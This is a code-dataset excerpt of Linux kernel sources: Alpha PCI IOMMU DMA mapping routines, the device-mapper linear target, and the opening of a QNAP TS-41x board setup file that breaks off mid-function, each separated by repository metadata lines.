/* Unmap a single streaming mode DMA translation.  The DMA_ADDR and
   SIZE must match what was provided for in a previous pci_map_single
   call.  All other usages are undefined.  After this call, reads by
   the cpu to the buffer are guaranteed to see whatever the device
   wrote there.  */
static void alpha_pci_unmap_page(struct device *dev, dma_addr_t dma_addr,
				 size_t size, enum dma_data_direction dir,
				 struct dma_attrs *attrs)
{
	unsigned long flags;
	struct pci_dev *pdev = alpha_gendev_to_pci(dev);
	struct pci_controller *hose = pdev ? pdev->sysdata : pci_isa_hose;
	struct pci_iommu_arena *arena;
	long dma_ofs, npages;

	BUG_ON(dir == PCI_DMA_NONE);

	/* Direct-map window addresses never went through an arena,
	   so there are no ptes to tear down. */
	if (dma_addr >= __direct_map_base
	    && dma_addr < __direct_map_base + __direct_map_size) {
		/* Nothing to do.  */

		DBGA2("pci_unmap_single: direct [%llx,%zx] from %pf\n",
		      dma_addr, size, __builtin_return_address(0));

		return;
	}

	/* Likewise for DAC addresses (above 32 bits). */
	if (dma_addr > 0xffffffff) {
		DBGA2("pci64_unmap_single: DAC [%llx,%zx] from %pf\n",
		      dma_addr, size, __builtin_return_address(0));
		return;
	}

	arena = hose->sg_pci;
	if (!arena || dma_addr < arena->dma_base)
		arena = hose->sg_isa;

	dma_ofs = (dma_addr - arena->dma_base) >> PAGE_SHIFT;
	if (dma_ofs * PAGE_SIZE >= arena->size) {
		/* The address lies outside the chosen arena: the caller
		   handed us a bogus mapping.  Complain and bail.  (A
		   BUG() that used to follow this return was unreachable
		   dead code and has been removed.) */
		printk(KERN_ERR "Bogus pci_unmap_single: dma_addr %llx "
		       " base %llx size %x\n",
		       dma_addr, arena->dma_base, arena->size);
		return;
	}

	npages = iommu_num_pages(dma_addr, size, PAGE_SIZE);

	spin_lock_irqsave(&arena->lock, flags);

	iommu_arena_free(arena, dma_ofs, npages);

	/* If we're freeing ptes above the `next_entry' pointer (they
	   may have snuck back into the TLB since the last wrap flush),
	   we need to flush the TLB before reallocating the latter.  */
	if (dma_ofs >= arena->next_entry)
		alpha_mv.mv_pci_tbi(hose, dma_addr, dma_addr + size - 1);

	spin_unlock_irqrestore(&arena->lock, flags);

	DBGA2("pci_unmap_single: sg [%llx,%zx] np %ld from %pf\n",
	      dma_addr, size, npages, __builtin_return_address(0));
}
/* Allocate and map kernel buffer using consistent mode DMA for PCI
   device.  Returns non-NULL cpu-view pointer to the buffer if
   successful and sets *DMA_ADDRP to the pci side dma address as well,
   else DMA_ADDRP is undefined.  */
static void *alpha_pci_alloc_coherent(struct device *dev, size_t size,
				      dma_addr_t *dma_addrp, gfp_t gfp,
				      struct dma_attrs *attrs)
{
	struct pci_dev *pdev = alpha_gendev_to_pci(dev);
	void *cpu_addr;
	long order = get_order(size);

	/* First try without GFP_DMA; we only fall back to GFP_DMA
	   below, when the address doesn't fit and there is no IOMMU. */
	gfp &= ~GFP_DMA;

try_again:
	cpu_addr = (void *)__get_free_pages(gfp, order);
	if (! cpu_addr) {
		printk(KERN_INFO "pci_alloc_consistent: "
		       "get_free_pages failed from %pf\n",
		       __builtin_return_address(0));
		/* ??? Really atomic allocation?  Otherwise we could play
		   with vmalloc and sg if we can't find contiguous memory. */
		return NULL;
	}
	memset(cpu_addr, 0, size);

	/* Map with dac_allowed=0: coherent buffers use SAC addresses. */
	*dma_addrp = pci_map_single_1(pdev, cpu_addr, size, 0);
	if (*dma_addrp == 0) {
		free_pages((unsigned long)cpu_addr, order);
		if (alpha_mv.mv_pci_tbi || (gfp & GFP_DMA))
			return NULL;
		/* The address doesn't fit required mask and we
		   do not have iommu. Try again with GFP_DMA. */
		gfp |= GFP_DMA;
		goto try_again;
	}

	DBGA2("pci_alloc_consistent: %zx -> [%p,%llx] from %pf\n",
	      size, cpu_addr, *dma_addrp, __builtin_return_address(0));

	return cpu_addr;
}
/* Free and unmap a consistent DMA buffer.  CPU_ADDR and DMA_ADDR must
   be values that were returned from pci_alloc_consistent.  SIZE must
   be the same as what as passed into pci_alloc_consistent.
   References to the memory and mappings associated with CPU_ADDR or
   DMA_ADDR past this call are illegal.  */
static void alpha_pci_free_coherent(struct device *dev, size_t size,
				    void *cpu_addr, dma_addr_t dma_addr,
				    struct dma_attrs *attrs)
{
	struct pci_dev *pdev = alpha_gendev_to_pci(dev);

	/* Undo the streaming mapping first, then release the pages. */
	pci_unmap_single(pdev, dma_addr, size, PCI_DMA_BIDIRECTIONAL);
	free_pages((unsigned long)cpu_addr, get_order(size));

	DBGA2("pci_free_consistent: [%llx,%zx] from %pf\n",
	      dma_addr, size, __builtin_return_address(0));
}
/* Classify the elements of the scatterlist. Write dma_address
of each element with:
0 : Followers all physically adjacent.
1 : Followers all virtually adjacent.
-1 : Not leader, physically adjacent to previous.
-2 : Not leader, virtually adjacent to previous.
Write dma_length of each leader with the combined lengths of
the mergable followers. */
#define SG_ENT_VIRT_ADDRESS(SG) (sg_virt((SG)))
#define SG_ENT_PHYS_ADDRESS(SG) __pa(SG_ENT_VIRT_ADDRESS(SG))
/*
 * Walk the scatterlist [sg, end) and tag each entry's dma_address
 * with its merge classification (see the encoding table above).  Each
 * leader additionally gets the combined dma_length of itself and all
 * of its mergeable followers.  VIRT_OK permits merging page-aligned
 * but physically discontiguous entries (only sensible when an IOMMU
 * will remap them into one virtually contiguous range).
 */
static void
sg_classify(struct device *dev, struct scatterlist *sg, struct scatterlist *end,
	    int virt_ok)
{
	unsigned long next_paddr;
	struct scatterlist *leader;
	long leader_flag, leader_length;
	unsigned int max_seg_size;

	leader = sg;
	leader_flag = 0;
	leader_length = leader->length;
	next_paddr = SG_ENT_PHYS_ADDRESS(leader) + leader_length;

	/* we will not merge sgs without a device. */
	max_seg_size = dev ? dma_get_max_seg_size(dev) : 0;
	for (++sg; sg < end; ++sg) {
		unsigned long addr, len;
		addr = SG_ENT_PHYS_ADDRESS(sg);
		len = sg->length;

		/* A merged segment may never exceed the device's limit. */
		if (leader_length + len > max_seg_size)
			goto new_segment;

		if (next_paddr == addr) {
			/* Physically adjacent to the previous entry. */
			sg->dma_address = -1;
			leader_length += len;
		} else if (((next_paddr | addr) & ~PAGE_MASK) == 0 && virt_ok) {
			/* Page-aligned gap: mergeable through the IOMMU. */
			sg->dma_address = -2;
			leader_flag = 1;
			leader_length += len;
		} else {
new_segment:
			/* Close out the current leader; start a new one. */
			leader->dma_address = leader_flag;
			leader->dma_length = leader_length;
			leader = sg;
			leader_flag = 0;
			leader_length = len;
		}

		next_paddr = addr + len;
	}

	/* Finalize the last leader. */
	leader->dma_address = leader_flag;
	leader->dma_length = leader_length;
}
/* Given a scatterlist leader, choose an allocation method and fill
   in the blanks.

   Tries, in order: the direct-map window (if the leader's run is
   physically contiguous), DAC, then an IOMMU arena allocation.  If
   the arena is exhausted for a virtually merged run, the run is
   re-classified without virtual merging and retried recursively.
   Returns 0 (direct/DAC, no arena used), 1 (arena mapping created),
   or -1 on failure.  */
static int
sg_fill(struct device *dev, struct scatterlist *leader, struct scatterlist *end,
	struct scatterlist *out, struct pci_iommu_arena *arena,
	dma_addr_t max_dma, int dac_allowed)
{
	unsigned long paddr = SG_ENT_PHYS_ADDRESS(leader);
	long size = leader->dma_length;
	struct scatterlist *sg;
	unsigned long *ptes;
	long npages, dma_ofs, i;

#if !DEBUG_NODIRECT
	/* If everything is physically contiguous, and the addresses
	   fall into the direct-map window, use it.  */
	if (leader->dma_address == 0
	    && paddr + size + __direct_map_base - 1 <= max_dma
	    && paddr + size <= __direct_map_size) {
		out->dma_address = paddr + __direct_map_base;
		out->dma_length = size;

		DBGA("    sg_fill: [%p,%lx] -> direct %llx\n",
		     __va(paddr), size, out->dma_address);

		return 0;
	}
#endif

	/* If physically contiguous and DAC is available, use it.  */
	if (leader->dma_address == 0 && dac_allowed) {
		out->dma_address = paddr + alpha_mv.pci_dac_offset;
		out->dma_length = size;

		DBGA("    sg_fill: [%p,%lx] -> DAC %llx\n",
		     __va(paddr), size, out->dma_address);

		return 0;
	}

	/* Otherwise, we'll use the iommu to make the pages virtually
	   contiguous.  */
	paddr &= ~PAGE_MASK;
	npages = iommu_num_pages(paddr, size, PAGE_SIZE);
	dma_ofs = iommu_arena_alloc(dev, arena, npages, 0);
	if (dma_ofs < 0) {
		/* If we attempted a direct map above but failed, die.  */
		if (leader->dma_address == 0)
			return -1;

		/* Otherwise, break up the remaining virtually contiguous
		   hunks into individual direct maps and retry.  */
		sg_classify(dev, leader, end, 0);
		return sg_fill(dev, leader, end, out, arena, max_dma, dac_allowed);
	}

	out->dma_address = arena->dma_base + dma_ofs*PAGE_SIZE + paddr;
	out->dma_length = size;

	DBGA("    sg_fill: [%p,%lx] -> sg %llx np %ld\n",
	     __va(paddr), size, out->dma_address, npages);

	/* All virtually contiguous.  We need to find the length of each
	   physically contiguous subsegment to fill in the ptes.  */
	ptes = &arena->ptes[dma_ofs];
	sg = leader;
	do {
#if DEBUG_ALLOC > 0
		struct scatterlist *last_sg = sg;
#endif

		size = sg->length;
		paddr = SG_ENT_PHYS_ADDRESS(sg);

		/* Coalesce the physically-adjacent followers (-1) into
		   this subsegment. */
		while (sg+1 < end && (int) sg[1].dma_address == -1) {
			size += sg[1].length;
			sg++;
		}

		npages = iommu_num_pages(paddr, size, PAGE_SIZE);

		paddr &= PAGE_MASK;
		for (i = 0; i < npages; ++i, paddr += PAGE_SIZE)
			*ptes++ = mk_iommu_pte(paddr);

#if DEBUG_ALLOC > 0
		DBGA("    (%ld) [%p,%x] np %ld\n",
		     last_sg - leader, SG_ENT_VIRT_ADDRESS(last_sg),
		     last_sg->length, npages);
		while (++last_sg <= sg) {
			DBGA("        (%ld) [%p,%x] cont\n",
			     last_sg - leader, SG_ENT_VIRT_ADDRESS(last_sg),
			     last_sg->length);
		}
#endif
	} while (++sg < end && (int) sg->dma_address < 0);

	return 1;
}
/*
 * dma_map_ops .map_sg hook: classify and merge the scatterlist
 * entries (sg_classify), then map each resulting leader through the
 * direct window, DAC, or an IOMMU arena (sg_fill).  Returns the
 * number of dma entries produced, or 0 on failure.
 */
static int alpha_pci_map_sg(struct device *dev, struct scatterlist *sg,
			    int nents, enum dma_data_direction dir,
			    struct dma_attrs *attrs)
{
	struct pci_dev *pdev = alpha_gendev_to_pci(dev);
	struct scatterlist *start, *end, *out;
	struct pci_controller *hose;
	struct pci_iommu_arena *arena;
	dma_addr_t max_dma;
	int dac_allowed;

	BUG_ON(dir == PCI_DMA_NONE);

	/* Test pdev, not dev: alpha_gendev_to_pci() may return NULL
	   even for a non-NULL dev (its ISA-bus-master case), and the
	   previous "dev ? ..." test then dereferenced a NULL pdev.
	   This also matches alpha_pci_map_page(). */
	dac_allowed = pdev ? pci_dac_dma_supported(pdev, pdev->dma_mask) : 0;

	/* Fast path single entry scatterlists.  */
	if (nents == 1) {
		sg->dma_length = sg->length;
		sg->dma_address
			= pci_map_single_1(pdev, SG_ENT_VIRT_ADDRESS(sg),
					   sg->length, dac_allowed);
		return sg->dma_address != 0;
	}

	start = sg;
	end = sg + nents;

	/* First, prepare information about the entries.  */
	sg_classify(dev, sg, end, alpha_mv.mv_pci_tbi != 0);

	/* Second, figure out where we're going to map things.  */
	if (alpha_mv.mv_pci_tbi) {
		hose = pdev ? pdev->sysdata : pci_isa_hose;
		max_dma = pdev ? pdev->dma_mask : ISA_DMA_MASK;
		arena = hose->sg_pci;
		if (!arena || arena->dma_base + arena->size - 1 > max_dma)
			arena = hose->sg_isa;
	} else {
		/* No IOMMU: direct map / DAC only. */
		max_dma = -1;
		arena = NULL;
		hose = NULL;
	}

	/* Third, iterate over the scatterlist leaders and allocate
	   dma space as needed.  */
	for (out = sg; sg < end; ++sg) {
		if ((int) sg->dma_address < 0)
			continue;	/* follower, handled by its leader */
		if (sg_fill(dev, sg, end, out, arena, max_dma, dac_allowed) < 0)
			goto error;
		out++;
	}

	/* Mark the end of the list for pci_unmap_sg.  */
	if (out < end)
		out->dma_length = 0;

	if (out - start == 0)
		printk(KERN_WARNING "pci_map_sg failed: no entries?\n");
	DBGA("pci_map_sg: %ld entries\n", out - start);

	return out - start;

error:
	printk(KERN_WARNING "pci_map_sg failed: "
	       "could not allocate dma page tables\n");

	/* Some allocation failed while mapping the scatterlist
	   entries.  Unmap them now.  */
	if (out > start)
		pci_unmap_sg(pdev, start, out - start, dir);
	return 0;
}
/* Unmap a set of streaming mode DMA translations.  Again, cpu read
   rules concerning calls here are the same as for pci_unmap_single()
   above.

   Frees all arena-backed entries under one lock acquisition and
   issues a single TLB flush covering the whole freed range if
   necessary.  */
static void alpha_pci_unmap_sg(struct device *dev, struct scatterlist *sg,
			       int nents, enum dma_data_direction dir,
			       struct dma_attrs *attrs)
{
	struct pci_dev *pdev = alpha_gendev_to_pci(dev);
	unsigned long flags;
	struct pci_controller *hose;
	struct pci_iommu_arena *arena;
	struct scatterlist *end;
	dma_addr_t max_dma;
	dma_addr_t fbeg, fend;	/* bounds of the freed region, for the flush */

	BUG_ON(dir == PCI_DMA_NONE);

	/* Without an IOMMU every mapping was direct/DAC: nothing to free. */
	if (! alpha_mv.mv_pci_tbi)
		return;

	hose = pdev ? pdev->sysdata : pci_isa_hose;
	max_dma = pdev ? pdev->dma_mask : ISA_DMA_MASK;
	arena = hose->sg_pci;
	if (!arena || arena->dma_base + arena->size - 1 > max_dma)
		arena = hose->sg_isa;

	fbeg = -1, fend = 0;

	spin_lock_irqsave(&arena->lock, flags);

	for (end = sg + nents; sg < end; ++sg) {
		dma_addr_t addr;
		size_t size;
		long npages, ofs;
		dma_addr_t tend;

		addr = sg->dma_address;
		size = sg->dma_length;
		/* dma_length == 0 is the end-of-list marker written by
		   alpha_pci_map_sg(). */
		if (!size)
			break;

		if (addr > 0xffffffff) {
			/* It's a DAC address -- nothing to do.  */
			DBGA("    (%ld) DAC [%llx,%zx]\n",
			     sg - end + nents, addr, size);
			continue;
		}

		if (addr >= __direct_map_base
		    && addr < __direct_map_base + __direct_map_size) {
			/* Nothing to do.  */
			DBGA("    (%ld) direct [%llx,%zx]\n",
			     sg - end + nents, addr, size);
			continue;
		}

		DBGA("    (%ld) sg [%llx,%zx]\n",
		     sg - end + nents, addr, size);

		npages = iommu_num_pages(addr, size, PAGE_SIZE);
		ofs = (addr - arena->dma_base) >> PAGE_SHIFT;
		iommu_arena_free(arena, ofs, npages);

		/* Widen the freed-range bounds for the final flush. */
		tend = addr + size - 1;
		if (fbeg > addr) fbeg = addr;
		if (fend < tend) fend = tend;
	}

	/* If we're freeing ptes above the `next_entry' pointer (they
	   may have snuck back into the TLB since the last wrap flush),
	   we need to flush the TLB before reallocating the latter.  */
	if ((fend - arena->dma_base) >> PAGE_SHIFT >= arena->next_entry)
		alpha_mv.mv_pci_tbi(hose, fbeg, fend);

	spin_unlock_irqrestore(&arena->lock, flags);

	DBGA("pci_unmap_sg: %ld entries\n", nents - (end - sg));
}
/* Return whether the given PCI device DMA address mask can be
   supported properly.  */
static int alpha_pci_supported(struct device *dev, u64 mask)
{
	struct pci_dev *pdev = alpha_gendev_to_pci(dev);
	struct pci_controller *hose;
	struct pci_iommu_arena *arena;

	/* If there exists a direct map, and the mask fits either
	   the entire direct mapped space or the total system memory as
	   shifted by the map base */
	if (__direct_map_size != 0
	    && (__direct_map_base + __direct_map_size - 1 <= mask ||
		__direct_map_base + (max_low_pfn << PAGE_SHIFT) - 1 <= mask))
		return 1;

	/* Check that we have a scatter-gather arena that fits.  */
	hose = pdev ? pdev->sysdata : pci_isa_hose;
	arena = hose->sg_isa;
	if (arena && arena->dma_base + arena->size - 1 <= mask)
		return 1;
	arena = hose->sg_pci;
	if (arena && arena->dma_base + arena->size - 1 <= mask)
		return 1;

	/* As last resort try ZONE_DMA.  */
	if (!__direct_map_base && MAX_DMA_ADDRESS - IDENT_ADDR - 1 <= mask)
		return 1;

	return 0;
}
/*
* AGP GART extensions to the IOMMU
*/
/*
 * Reserve PG_COUNT consecutive arena entries (aligned per ALIGN_MASK)
 * for a later iommu_bind().  Entries are set to IOMMU_RESERVED_PTE so
 * the IOMMU TLB cannot load them meanwhile.  Returns the starting pte
 * index, -EINVAL for a missing arena, or -1 on exhaustion.
 */
int
iommu_reserve(struct pci_iommu_arena *arena, long pg_count, long align_mask)
{
	unsigned long flags;
	unsigned long *ptes;
	long i, p;

	if (!arena) return -EINVAL;

	spin_lock_irqsave(&arena->lock, flags);

	/* Search for N empty ptes.  */
	ptes = arena->ptes;
	p = iommu_arena_find_pages(NULL, arena, pg_count, align_mask);
	if (p < 0) {
		spin_unlock_irqrestore(&arena->lock, flags);
		return -1;
	}

	/* Success.  Mark them all reserved (ie not zero and invalid)
	   for the iommu tlb that could load them from under us.
	   They will be filled in with valid bits by _bind() */
	for (i = 0; i < pg_count; ++i)
		ptes[p+i] = IOMMU_RESERVED_PTE;

	arena->next_entry = p + pg_count;
	spin_unlock_irqrestore(&arena->lock, flags);

	return p;
}
/*
 * Release a range previously obtained from iommu_reserve().  Refuses
 * with -EBUSY unless every entry in the range is still in the
 * reserved state (i.e. never bound, or already unbound).
 */
int
iommu_release(struct pci_iommu_arena *arena, long pg_start, long pg_count)
{
	unsigned long *pte, *limit;

	if (!arena) return -EINVAL;

	/* Make sure they're all reserved first... */
	pte = arena->ptes + pg_start;
	limit = pte + pg_count;
	for (; pte < limit; pte++)
		if (*pte != IOMMU_RESERVED_PTE)
			return -EBUSY;

	iommu_arena_free(arena, pg_start, pg_count);
	return 0;
}
/*
 * Bind PG_COUNT pages to a range reserved via iommu_reserve().  The
 * whole range is verified to still be IOMMU_RESERVED_PTE under the
 * arena lock before any entry is overwritten; returns -EBUSY
 * otherwise, -EINVAL for a missing arena, 0 on success.
 */
int
iommu_bind(struct pci_iommu_arena *arena, long pg_start, long pg_count,
	   struct page **pages)
{
	unsigned long flags;
	unsigned long *ptes;
	long i, j;

	if (!arena) return -EINVAL;

	spin_lock_irqsave(&arena->lock, flags);

	ptes = arena->ptes;

	/* Verify-then-write, all under the lock, so a concurrent
	   binder cannot interleave. */
	for(j = pg_start; j < pg_start + pg_count; j++) {
		if (ptes[j] != IOMMU_RESERVED_PTE) {
			spin_unlock_irqrestore(&arena->lock, flags);
			return -EBUSY;
		}
	}

	for(i = 0, j = pg_start; i < pg_count; i++, j++)
		ptes[j] = mk_iommu_pte(page_to_phys(pages[i]));

	spin_unlock_irqrestore(&arena->lock, flags);

	return 0;
}
/*
 * Undo iommu_bind(): return PG_COUNT entries starting at PG_START to
 * the reserved (allocated but unbound) state.
 */
int
iommu_unbind(struct pci_iommu_arena *arena, long pg_start, long pg_count)
{
	unsigned long *pte, *limit;

	if (!arena) return -EINVAL;

	pte = arena->ptes + pg_start;
	for (limit = pte + pg_count; pte < limit; pte++)
		*pte = IOMMU_RESERVED_PTE;

	return 0;
}
/*
 * dma_map_ops .mapping_error hook: this implementation uses a zero
 * bus address as its failure sentinel (see pci_map_single_1).
 */
static int alpha_pci_mapping_error(struct device *dev, dma_addr_t dma_addr)
{
	return !dma_addr;
}
/*
 * dma_map_ops .set_dma_mask hook: accept the new mask only when the
 * device has a dma_mask pointer and pci_dma_supported() approves the
 * mask; otherwise return -EIO.
 */
static int alpha_pci_set_mask(struct device *dev, u64 mask)
{
	if (!dev->dma_mask ||
	    !pci_dma_supported(alpha_gendev_to_pci(dev), mask))
		return -EIO;

	*dev->dma_mask = mask;
	return 0;
}
/*
 * dma_map_ops dispatch table wiring the Alpha PCI IOMMU
 * implementations above into the generic DMA API.
 */
struct dma_map_ops alpha_pci_ops = {
	.alloc			= alpha_pci_alloc_coherent,
	.free			= alpha_pci_free_coherent,
	.map_page		= alpha_pci_map_page,
	.unmap_page		= alpha_pci_unmap_page,
	.map_sg			= alpha_pci_map_sg,
	.unmap_sg		= alpha_pci_unmap_sg,
	.mapping_error		= alpha_pci_mapping_error,
	.dma_supported		= alpha_pci_supported,
	.set_dma_mask		= alpha_pci_set_mask,
};

/* PCI ops are the platform-wide default DMA implementation. */
struct dma_map_ops *dma_ops = &alpha_pci_ops;
EXPORT_SYMBOL(dma_ops);
| gpl-2.0 |
profglavcho/mt6735-kernel-3.10.61 | drivers/md/dm-linear.c | 2306 | 3895 | /*
* Copyright (C) 2001-2003 Sistina Software (UK) Limited.
*
* This file is released under the GPL.
*/
#include "dm.h"
#include <linux/module.h>
#include <linux/init.h>
#include <linux/blkdev.h>
#include <linux/bio.h>
#include <linux/slab.h>
#include <linux/device-mapper.h>
#define DM_MSG_PREFIX "linear"
/*
* Linear: maps a linear range of a device.
*/
/* Per-target context for a linear mapping. */
struct linear_c {
	struct dm_dev *dev;	/* backing device */
	sector_t start;		/* offset on the backing device, in sectors */
};
/*
 * Construct a linear mapping: <dev_path> <offset>
 *
 * Parses the offset (argv[1], in sectors), acquires the backing
 * device (argv[0]) and stashes the context in ti->private.
 * Returns 0 on success, a negative errno with ti->error set otherwise.
 */
static int linear_ctr(struct dm_target *ti, unsigned int argc, char **argv)
{
	struct linear_c *lc;
	unsigned long long tmp;
	char dummy;	/* catches trailing junk after the number */

	if (argc != 2) {
		ti->error = "Invalid argument count";
		return -EINVAL;
	}

	lc = kmalloc(sizeof(*lc), GFP_KERNEL);
	if (lc == NULL) {
		ti->error = "dm-linear: Cannot allocate linear context";
		return -ENOMEM;
	}

	/* "%llu%c" must match exactly one item: a pure number. */
	if (sscanf(argv[1], "%llu%c", &tmp, &dummy) != 1) {
		ti->error = "dm-linear: Invalid device sector";
		goto bad;
	}
	lc->start = tmp;

	if (dm_get_device(ti, argv[0], dm_table_get_mode(ti->table), &lc->dev)) {
		ti->error = "dm-linear: Device lookup failed";
		goto bad;
	}

	/* Linear passes flush/discard/write-same straight through. */
	ti->num_flush_bios = 1;
	ti->num_discard_bios = 1;
	ti->num_write_same_bios = 1;
	ti->private = lc;
	return 0;

bad:
	kfree(lc);
	return -EINVAL;
}
/* Destructor: drop the backing device reference and free the context. */
static void linear_dtr(struct dm_target *ti)
{
	struct linear_c *lc = (struct linear_c *) ti->private;

	dm_put_device(ti, lc->dev);
	kfree(lc);
}
/* Translate a target-relative sector to its backing-device sector. */
static sector_t linear_map_sector(struct dm_target *ti, sector_t bi_sector)
{
	struct linear_c *lc = ti->private;

	return dm_target_offset(ti, bi_sector) + lc->start;
}
/*
 * Redirect BIO to the backing device, remapping its sector when it
 * carries data (zero-sector bios, e.g. empty flushes, keep sector 0).
 */
static void linear_map_bio(struct dm_target *ti, struct bio *bio)
{
	struct linear_c *lc = ti->private;

	bio->bi_bdev = lc->dev->bdev;
	if (bio_sectors(bio))
		bio->bi_sector = linear_map_sector(ti, bio->bi_sector);
}
/* .map hook: remap the bio and hand it back to dm core for submission. */
static int linear_map(struct dm_target *ti, struct bio *bio)
{
	linear_map_bio(ti, bio);

	return DM_MAPIO_REMAPPED;
}
/*
 * .status hook: INFO has nothing to report; TABLE emits the
 * constructor arguments "<dev_name> <start>" so the table can be
 * reloaded verbatim.
 */
static void linear_status(struct dm_target *ti, status_type_t type,
			  unsigned status_flags, char *result, unsigned maxlen)
{
	struct linear_c *lc = (struct linear_c *) ti->private;

	switch (type) {
	case STATUSTYPE_INFO:
		result[0] = '\0';
		break;

	case STATUSTYPE_TABLE:
		snprintf(result, maxlen, "%s %llu", lc->dev->name,
			 (unsigned long long)lc->start);
		break;
	}
}
/*
 * .ioctl hook: forward the ioctl to the backing block device.  When
 * the target is not a 1:1 view of the whole device (non-zero start or
 * differing length), the command is first vetted by
 * scsi_verify_blk_ioctl() to block commands that assume whole-device
 * geometry.
 */
static int linear_ioctl(struct dm_target *ti, unsigned int cmd,
			unsigned long arg)
{
	struct linear_c *lc = (struct linear_c *) ti->private;
	struct dm_dev *dev = lc->dev;
	int r = 0;

	/*
	 * Only pass ioctls through if the device sizes match exactly.
	 */
	if (lc->start ||
	    ti->len != i_size_read(dev->bdev->bd_inode) >> SECTOR_SHIFT)
		r = scsi_verify_blk_ioctl(NULL, cmd);

	return r ? : __blkdev_driver_ioctl(dev->bdev, dev->mode, cmd, arg);
}
/*
 * .merge hook: ask the backing device's merge_bvec_fn (if any) how
 * much of BIOVEC may be merged, after translating the sector into the
 * backing device's address space.
 */
static int linear_merge(struct dm_target *ti, struct bvec_merge_data *bvm,
			struct bio_vec *biovec, int max_size)
{
	struct linear_c *lc = ti->private;
	struct request_queue *q = bdev_get_queue(lc->dev->bdev);

	/* No restriction from the lower queue: allow the full size. */
	if (!q->merge_bvec_fn)
		return max_size;

	bvm->bi_bdev = lc->dev->bdev;
	bvm->bi_sector = linear_map_sector(ti, bvm->bi_sector);

	return min(max_size, q->merge_bvec_fn(q, bvm, biovec));
}
/* .iterate_devices hook: report the single underlying device span. */
static int linear_iterate_devices(struct dm_target *ti,
				  iterate_devices_callout_fn fn, void *data)
{
	struct linear_c *lc = ti->private;

	return fn(ti, lc->dev, lc->start, ti->len, data);
}
/* Registration record for the "linear" device-mapper target. */
static struct target_type linear_target = {
	.name   = "linear",
	.version = {1, 2, 1},
	.module = THIS_MODULE,
	.ctr    = linear_ctr,
	.dtr    = linear_dtr,
	.map    = linear_map,
	.status = linear_status,
	.ioctl  = linear_ioctl,
	.merge  = linear_merge,
	.iterate_devices = linear_iterate_devices,
};
/* Register the "linear" target with the device-mapper core. */
int __init dm_linear_init(void)
{
	int r;

	r = dm_register_target(&linear_target);
	if (r < 0)
		DMERR("register failed %d", r);

	return r;
}
/* Unregister the "linear" target on module teardown. */
void dm_linear_exit(void)
{
	dm_unregister_target(&linear_target);
}
| gpl-2.0 |
RockchipOpensourceCommunity/px2-android-kernel-3.0 | arch/arm/mach-kirkwood/ts41x-setup.c | 2818 | 4577 | /*
*
* QNAP TS-410, TS-410U, TS-419P and TS-419U Turbo NAS Board Setup
*
* Copyright (C) 2009-2010 Martin Michlmayr <tbm@cyrius.com>
* Copyright (C) 2008 Byron Bradley <byron.bbradley@gmail.com>
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version
* 2 of the License, or (at your option) any later version.
*/
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/platform_device.h>
#include <linux/i2c.h>
#include <linux/mv643xx_eth.h>
#include <linux/ata_platform.h>
#include <linux/gpio.h>
#include <linux/gpio_keys.h>
#include <linux/input.h>
#include <asm/mach-types.h>
#include <asm/mach/arch.h>
#include <mach/kirkwood.h>
#include "common.h"
#include "mpp.h"
#include "tsx1x-common.h"
/* for the PCIe reset workaround */
#include <plat/pcie.h>
#define QNAP_TS41X_JUMPER_JP1 45
static struct i2c_board_info __initdata qnap_ts41x_i2c_rtc = {
I2C_BOARD_INFO("s35390a", 0x30),
};
static struct mv643xx_eth_platform_data qnap_ts41x_ge00_data = {
.phy_addr = MV643XX_ETH_PHY_ADDR(8),
};
static struct mv643xx_eth_platform_data qnap_ts41x_ge01_data = {
.phy_addr = MV643XX_ETH_PHY_ADDR(0),
};
static struct mv_sata_platform_data qnap_ts41x_sata_data = {
.n_ports = 2,
};
static struct gpio_keys_button qnap_ts41x_buttons[] = {
{
.code = KEY_COPY,
.gpio = 43,
.desc = "USB Copy",
.active_low = 1,
},
{
.code = KEY_RESTART,
.gpio = 37,
.desc = "Reset",
.active_low = 1,
},
};
static struct gpio_keys_platform_data qnap_ts41x_button_data = {
.buttons = qnap_ts41x_buttons,
.nbuttons = ARRAY_SIZE(qnap_ts41x_buttons),
};
static struct platform_device qnap_ts41x_button_device = {
.name = "gpio-keys",
.id = -1,
.num_resources = 0,
.dev = {
.platform_data = &qnap_ts41x_button_data,
}
};
static unsigned int qnap_ts41x_mpp_config[] __initdata = {
MPP0_SPI_SCn,
MPP1_SPI_MOSI,
MPP2_SPI_SCK,
MPP3_SPI_MISO,
MPP6_SYSRST_OUTn,
MPP7_PEX_RST_OUTn,
MPP8_TW0_SDA,
MPP9_TW0_SCK,
MPP10_UART0_TXD,
MPP11_UART0_RXD,
MPP13_UART1_TXD, /* PIC controller */
MPP14_UART1_RXD, /* PIC controller */
MPP15_SATA0_ACTn,
MPP16_SATA1_ACTn,
MPP20_GE1_TXD0,
MPP21_GE1_TXD1,
MPP22_GE1_TXD2,
MPP23_GE1_TXD3,
MPP24_GE1_RXD0,
MPP25_GE1_RXD1,
MPP26_GE1_RXD2,
MPP27_GE1_RXD3,
MPP30_GE1_RXCTL,
MPP31_GE1_RXCLK,
MPP32_GE1_TCLKOUT,
MPP33_GE1_TXCTL,
MPP36_GPIO, /* RAM: 0: 256 MB, 1: 512 MB */
MPP37_GPIO, /* Reset button */
MPP43_GPIO, /* USB Copy button */
MPP44_GPIO, /* Board ID: 0: TS-419U, 1: TS-419 */
MPP45_GPIO, /* JP1: 0: LCD, 1: serial console */
MPP46_GPIO, /* External SATA HDD1 error indicator */
MPP47_GPIO, /* External SATA HDD2 error indicator */
MPP48_GPIO, /* External SATA HDD3 error indicator */
MPP49_GPIO, /* External SATA HDD4 error indicator */
0
};
/*
 * Board init for the QNAP TS-41x family: configure MPP pins, bring up
 * UARTs, flash, I2C (RTC), both ethernet ports, SATA, EHCI and the
 * GPIO buttons, and hook up the PIC-based power-off handler.
 */
static void __init qnap_ts41x_init(void)
{
	u32 dev, rev;

	/*
	 * Basic setup. Needs to be called early.
	 */
	kirkwood_init();
	kirkwood_mpp_conf(qnap_ts41x_mpp_config);

	kirkwood_uart0_init();
	kirkwood_uart1_init(); /* A PIC controller is connected here. */
	qnap_tsx1x_register_flash();
	kirkwood_i2c_init();
	i2c_register_board_info(0, &qnap_ts41x_i2c_rtc, 1);

	/* The 6282 variant wires the ethernet PHYs at different addresses. */
	kirkwood_pcie_id(&dev, &rev);
	if (dev == MV88F6282_DEV_ID) {
		qnap_ts41x_ge00_data.phy_addr = MV643XX_ETH_PHY_ADDR(0);
